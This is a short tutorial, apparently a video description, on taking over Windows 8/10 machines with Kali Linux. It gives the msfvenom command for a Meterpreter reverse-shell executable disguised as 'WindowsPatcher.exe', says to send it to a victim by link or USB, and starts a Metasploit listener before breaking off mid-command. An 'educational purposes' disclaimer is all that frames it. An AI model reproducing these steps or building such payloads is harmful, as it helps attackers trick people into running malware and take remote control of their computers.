HOW TO HACK WINDOWS 8/10 USING KALI 2.0
Dear Friends, Today I’m gonna tell you. How to hack windows 8/10 using Kali 2.0 It's very easy do some step which i explained below. Note:- “This video is only for educational purposes. My motive to provide basic information about that” Step:1- You should have kali 2.0 run kali 2.0 Step:2- Open Terminal ( CTRL + ALT + T ) Step:3- Type the following commands on terminal. Step:4- Check your ip by using ifconfig Step:5- Now create the exploit file like exe or bat msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.7.6.177 LPORT=4444 -f exe > /root/Desktop/WindowsPatcher.exe after that command executed a exe file generated copy that file and send it to victim computer using link or usb Step:6- Now the terminal and type msfconsole after this command metasploit framework will be open Step:7- Now type use multi/handler set PAYLOAD windows